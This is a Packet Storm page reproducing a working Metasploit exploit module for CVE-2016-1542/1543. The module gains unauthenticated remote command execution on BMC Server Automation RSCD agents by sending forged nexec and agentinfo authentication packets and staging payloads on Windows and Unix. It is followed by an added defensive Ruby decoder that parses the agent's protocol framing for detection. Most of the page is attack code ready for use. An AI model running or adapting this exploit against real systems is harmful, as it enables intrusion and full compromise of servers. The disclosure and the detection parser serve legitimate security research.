BMC Server Automation RSCD Agent NSH Remote Command Execution

31 Jan 2018 00:00:00 | Reported by Nicky Bloor | Type: packetstorm | Source: packetstormsecurity.com

This Metasploit module, BMC Server Automation RSCD Agent NSH Remote Command Execution, allows arbitrary OS commands to be executed on the RSCD agent host without authentication, under both Windows and Unix/Linux. The exploit's targets are the Windows/VBS Stager and Unix/Linux platforms.

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'BMC Server Automation RSCD Agent NSH Remote ' \
                'Command Execution',
      'Description' => %q(
        This module exploits a weak access control check in the BMC Server
        Automation RSCD agent that allows arbitrary operating system commands
        to be executed without authentication.
        Note: Under Windows, non-powershell commands may need to be prefixed
        with 'cmd /c'.
      ),
      'Author' =>
        [
          'Olga Yanushkevich, ERNW <@yaole0>', # Vulnerability discovery
          'Nicky Bloor (@NickstaDB) <[email protected]>' # RCE payload and Metasploit module
        ],
      'References' =>
        [
          ['URL', 'https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/'],
          ['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'],
          ['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'],
          ['CVE', '2016-1542'],
          ['CVE', '2016-1543']
        ],
      'DisclosureDate' => 'Mar 16 2016',
      'Privileged' => false,
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'Platform' => %w[win linux unix],
      'Targets' =>
        [
          ['Automatic', {}],
          [
            'Windows/VBS Stager', {
              'Platform' => 'win',
              'Payload' => { 'Space' => 8100 }
            }
          ],
          [
            'Unix/Linux', {
              'Platform' => %w[linux unix],
              'Payload' => { 'Space' => 32_700 }
            }
          ],
          [
            'Generic Command', {
              'Arch' => ARCH_CMD,
              'Platform' => %w[linux unix win]
            }
          ]
        ],
      'DefaultTarget' => 0,
      'License' => MSF_LICENSE,
      'Payload' => {
        'BadChars' => "\x00\x09\x0a"
      },
      'CmdStagerFlavor' => %w[vbs echo])
    )

    register_options(
      [
        Opt::RPORT(4750)
      ]
    )

    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
  end

  def check
    # Send agentinfo request and check result
    vprint_status('Checking for BMC with agentinfo request.')
    res = send_agentinfo_request

    # Check for successful platform detection
    if res[0] == 1
      vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])
      return CheckCode::Detected
    end

    # Get first four bytes of the packet which should hold the content length
    res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0

    # Return unknown if the packet format appears correct (length field check)
    if res[1] && res[1].length - 4 == res_len
      vprint_warning('Target appears to be BMC, however an unexpected ' \
                     'agentinfo response was returned.')
      vprint_warning('Response: ' + res[1])
      return CheckCode::Unknown
    end

    # Invalid response, probably not a BMC RSCD target
    vprint_error('The target does not appear to be a BMC RSCD agent.')
    vprint_error('Response: ' + res[1]) if res[1]
    CheckCode::Safe
  end

  def exploit
    # Do auto target selection
    target_name = target.name

    if target_name == 'Automatic'
      # Attempt to detect the target platform
      vprint_status('Detecting remote platform for auto target selection.')
      platform = send_agentinfo_request

      # Fail if platform detection was unsuccessful
      if platform[0].zero?
        fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \
                                            'detecting target platform.')
      end

      # Set target based on returned platform
      target_name = if platform[1].downcase.include?('windows')
                      'Windows/VBS Stager'
                    else
                      'Unix/Linux'
                    end
    end

    # Exploit based on target
    vprint_status('Generating and delivering payload.')
    if target_name == 'Windows/VBS Stager'
      if payload.raw.start_with?('powershell', 'cmd')
        execute_command(payload.raw)
      else
        execute_cmdstager(flavor: :vbs, linemax: payload.space)
      end
      handler
    elsif target_name == 'Unix/Linux'
      execute_cmdstager(flavor: :echo, linemax: payload.space)
      handler
    elsif target_name == 'Generic Command' # must match the target name declared above
      send_nexec_request(payload.raw, true)
    end
  end

  # Execute a command but don't print output
  def execute_command(command, opts = {})
    if opts[:flavor] == :vbs
      if command.start_with?('powershell') == false
        if command.start_with?('cmd') == false
          send_nexec_request('cmd /c ' + command, false)
          return
        end
      end
    end
    send_nexec_request(command, false)
  end

  # Connect to the RSCD agent and execute a command via nexec
  def send_nexec_request(command, show_output)
    # Connect and auth
    vprint_status('Connecting to RSCD agent and sending fake auth.')
    connect_to_rscd
    send_fake_nexec_auth

    # Generate and send the payload
    vprint_status('Sending command to execute.')
    sock.put(generate_cmd_pkt(command))

    # Finish the nexec request
    sock.put("\x00\x00\x00\x22\x30\x30\x30\x30\x30\x30\x31\x61\x30\x30\x30" \
             "\x30\x30\x30\x31\x32\x77\x38\x30\x3b\x34\x31\x3b\x33\x39\x30" \
             "\x35\x38\x3b\x32\x34\x38\x35\x31")
    sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
             "\x30\x30\x30\x30\x32\x65\x7f")
    sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
             "\x30\x30\x30\x30\x32\x69\x03")
    sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
             "\x30\x30\x30\x30\x32\x74\x31")
    sock.put("\x00\x00\x00\x1c\x30\x30\x30\x30\x30\x30\x31\x34\x30\x30\x30" \
             "\x30\x30\x30\x30\x63\x77\x38\x30\x3b\x34\x31\x3b\x38\x30\x3b" \
             "\x34\x31")
    sock.put("\x00\x00\x00\x11\x30\x30\x30\x30\x30\x30\x30\x39\x30\x30\x30" \
             "\x30\x30\x30\x30\x31\x7a")

    # Get the response from the RSCD agent and disconnect
    vprint_status('Reading response from RSCD agent.')
    res = read_cmd_output
    if show_output == true
      if res && res[0] == 1
        print_good("Output\n" + res[1])
      else
        print_warning('Command execution failed, the command may not exist.')
        vprint_warning("Output\n" + res[1])
      end
    end
    disconnect
  end

  # Attempt to retrieve RSCD agent info and return the platform string
  def send_agentinfo_request
    # Connect and send fake auth
    vprint_status('Connecting to RSCD agent and sending fake auth.')
    connect_to_rscd
    send_fake_agentinfo_auth

    # Send agentinfo request, read the response, and disconnect
    vprint_status('Requesting agent information.')
    sock.put("\x00\x00\x00\x32\x30\x30\x30\x30\x30\x30\x32\x61\x30\x30\x30" \
             "\x30\x30\x30\x31\x30\x36\x34\x3b\x30\x3b\x32\x3b\x36\x66\x37" \
             "\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x30\x32\x34" \
             "\x31\x30\x30\x30\x30\x30\x30\x30\x30")
    res = sock.get_once
    disconnect

    # Return the platform field from the response if it looks valid
    # (sock.get_once may return nil, so guard before reading the length)
    res_len = res && res.length > 3 ? res[0..3].unpack('N')[0] : 0
    return [1, res.split(';')[4]] if res &&
                                     res.split(';').length > 6 &&
                                     res.length == (res_len + 4)

    # Invalid or unexpected response format, return the complete response
    [0, res]
  end

  # Connect to the target and upgrade to an encrypted connection
  def connect_to_rscd
    connect
    sock.put('TLS')
    sock.extend(Rex::Socket::SslTcp)
    sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
    sock.sslctx.options = OpenSSL::SSL::OP_ALL
    sock.sslctx.ciphers = 'ALL'
    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
    sock.sslsock.connect
  end

  # Send fake agentinfo auth packet and ignore the response
  def send_fake_agentinfo_auth
    sock.put("\x00\x00\x00\x5e\x30\x30\x30\x30\x30\x30\x35\x36\x30\x30\x30" \
             "\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x35\x3b\x38\x38" \
             "\x30\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x35" \
             "\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x39" \
             "\x3b\x61\x67\x65\x6e\x74\x69\x6e\x66\x6f\x3b\x2d\x3b\x2d\x3b" \
             "\x30\x3b\x2d\x3b\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) +
             "\x3b\x55\x54\x46\x2d\x38")
    sock.get_once
  end

  # Send fake nexec auth packet and ignore the response
  def send_fake_nexec_auth
    sock.put("\x00\x00\x00\x5a\x30\x30\x30\x30\x30\x30\x35\x32\x30\x30\x30" \
             "\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x31\x3b\x64\x61" \
             "\x34\x3b\x64\x61\x34\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x31" \
             "\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x35" \
             "\x3b\x6e\x65\x78\x65\x63\x3b\x2d\x3b\x2d\x3b\x30\x3b\x2d\x3b" \
             "\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x55" \
             "\x54\x46\x2d\x38")
    sock.get_once
  end

  # Generate a payload packet
  def generate_cmd_pkt(command)
    # Encode back slashes
    pkt = command.gsub('\\', "\xc1\xdc")

    # Encode double quotes unless powershell is being used
    pkt = pkt.gsub('"', "\xc2\x68") unless pkt.start_with?('powershell')

    # Construct the body of the payload packet
    pkt = pad_number(pkt.length + 32) + "\x30\x30\x30\x30\x30\x30\x31\x30" \
          "\x62\x37\x3b\x30\x3b\x32\x3b\x63\x61\x65\x3b\x64\x61\x34\x3b\x30" +
          pad_number(pkt.length) + pkt

    # Prefix with the packet length and return
    [pkt.length].pack('N') + pkt
  end

  # Convert the given number to a hex string padded to 8 chars
  def pad_number(num)
    format('%08x', num)
  end

  # Read the command output from the server
  def read_cmd_output
    all_output = ''
    response_done = false

    # Read the entire response from the RSCD service
    while response_done == false
      # Read a response chunk
      chunk = sock.get_once
      next unless chunk && chunk.length > 4
      chunk_len = chunk[0..3].unpack('N')[0]
      chunk = chunk[4..chunk.length]
      chunk += sock.get_once while chunk.length < chunk_len

      # Check for the "end of output" chunk
      if chunk_len == 18 && chunk.start_with?("\x30\x30\x30\x30\x30\x30\x30" \
                                              "\x61\x30\x30\x30\x30\x30\x30" \
                                              "\x30\x32\x78")
        # Response has completed
        response_done = true
      elsif all_output == ''
        # Keep the first response chunk as-is
        all_output += chunk

        # If the command failed, we're done
        response_done = true if all_output[8..15].to_i(16) != 1
      else
        # Append everything but the length fields to the output buffer
        all_output += chunk[17..chunk.length]
      end
    end

    # Return output if response indicated success
    return [1, all_output[26..all_output.length]] if
      all_output &&
      all_output.length > 26 &&
      all_output[8..15].to_i(16) == 1

    # Return nothing if there isn't enough data for error output
    return [0, ''] unless all_output && all_output.length > 17

    # Get the length of the error output and return the error
    err_len = all_output[8..15].to_i(16) - 1
    [0, all_output[17..17 + err_len]]
  end
end
```
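The hex strings the module sends and the fixed offsets it reads in `check`, `send_agentinfo_request` and `read_cmd_output` all follow one framing: a 4-byte big-endian length, an 8-character ASCII-hex inner length, then a sequence of items that each carry their own 8-character hex length and hold `;`-separated fields. The decoder below is an added example written for this page; it is not part of the Metasploit module or of BMC's software. The framing it assumes is inferred from the module's constant packets, the `AGENTINFO_REQUEST` bytes are the ones the module sends, the `SAMPLE_RESPONSE` is constructed rather than captured from a real agent, and the names `parse_nsh_packet`, `rscd_check_code` and `NshItem` are this example's own. It is the kind of strict parser a protocol-aware sensor on TCP/4750 or an exposure check needs, so that no field is trusted before every length has been checked against the bytes actually present.

```ruby
# Added example, not part of the Metasploit module: a strict decoder for the
# RSCD/NSH framing that the module above hard-codes as hex strings.
#
# Framing, as inferred from the module's constant packets (an assumption):
#   4 bytes  big-endian length of everything after these 4 bytes
#   8 bytes  ASCII hex: length of everything after these 8 bytes
#   repeat:  8 bytes ASCII hex item length, then that many bytes of item
# Items are ';'-separated fields, e.g. "64;0;2;6f7;880;0".

# The agentinfo request exactly as the module sends it (bytes from the page).
AGENTINFO_REQUEST = ("\x00\x00\x00\x32\x30\x30\x30\x30\x30\x30\x32\x61\x30\x30\x30" \
                     "\x30\x30\x30\x31\x30\x36\x34\x3b\x30\x3b\x32\x3b\x36\x66\x37" \
                     "\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x30\x32\x34" \
                     "\x31\x30\x30\x30\x30\x30\x30\x30\x30").b

# Constructed sample of a framed reply (not a real agent capture): two items,
# wrapped with the same length arithmetic the module's generate_cmd_pkt uses.
SAMPLE_RESPONSE = begin
  items = ['64;0;2;6f7;880;0', 'demo;Linux;agent;response']
  rest = items.map { |i| format('%08x', i.bytesize) + i }.join
  body = format('%08x', rest.bytesize) + rest
  [body.bytesize].pack('N') + body
end

NshItem = Struct.new(:raw) do
  # Split the item into its ';'-delimited fields, keeping empty trailing ones.
  def fields
    raw.split(';', -1)
  end
end

HEX8 = /\A\h{8}\z/

# Parse one framed packet into { declared:, inner:, items: }.
# Every length is checked against the bytes actually present before any
# field is read; a malformed frame raises ArgumentError instead of being
# indexed blindly at fixed offsets.
def parse_nsh_packet(bytes)
  bytes = bytes.b
  raise ArgumentError, 'short frame' if bytes.bytesize < 12

  declared = bytes[0, 4].unpack1('N')
  body = bytes[4..-1]
  unless declared == body.bytesize
    raise ArgumentError, "prefix says #{declared} bytes, frame has #{body.bytesize}"
  end

  inner_hex = body[0, 8]
  raise ArgumentError, 'inner length is not 8 hex digits' unless inner_hex.match?(HEX8)
  inner = inner_hex.to_i(16)
  rest = body[8..-1]
  raise ArgumentError, "inner length #{inner} != #{rest.bytesize}" unless inner == rest.bytesize

  items = []
  pos = 0
  while pos < rest.bytesize
    len_hex = rest[pos, 8]
    raise ArgumentError, "item length at offset #{pos} is not hex" unless len_hex.match?(HEX8)
    len = len_hex.to_i(16)
    pos += 8
    raise ArgumentError, "item at offset #{pos} overruns the frame" if pos + len > rest.bytesize
    items << NshItem.new(rest[pos, len])
    pos += len
  end
  { declared: declared, inner: inner, items: items }
end

# Classify a reply the way the module's check method does, but only after
# the frame has been validated:
#   :detected  well-formed frame with more than six ';' fields (the module's
#              own threshold for a usable agentinfo reply)
#   :unknown   the 4-byte length prefix is consistent but the frame is
#              otherwise not what we expect
#   :safe      does not look like an RSCD/NSH frame at all
def rscd_check_code(bytes)
  bytes = bytes.b
  begin
    parse_nsh_packet(bytes)
    return bytes[4..-1].split(';').length > 6 ? :detected : :unknown
  rescue ArgumentError
    # Fall through to the weaker prefix-only test
  end
  return :safe if bytes.bytesize < 4

  bytes[0, 4].unpack1('N') == bytes.bytesize - 4 ? :unknown : :safe
end

if $PROGRAM_NAME == __FILE__
  pkt = parse_nsh_packet(AGENTINFO_REQUEST)
  puts "agentinfo request items: #{pkt[:items].map(&:raw).inspect}"
  puts "sample reply classified as #{rscd_check_code(SAMPLE_RESPONSE)}"
end
```

Decoding the module's own agentinfo request yields the items `64;0;2;6f7;880;0`, `41` and an empty item, which is where the `split(';')` field count the module relies on comes from. Because the module's `check` only compares the 4-byte prefix with the response length, a reply that passes that test but fails the inner-length or item-length checks is reported here as `:unknown` rather than being indexed at fixed offsets, which is the behaviour you want from anything that inspects this traffic defensively.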
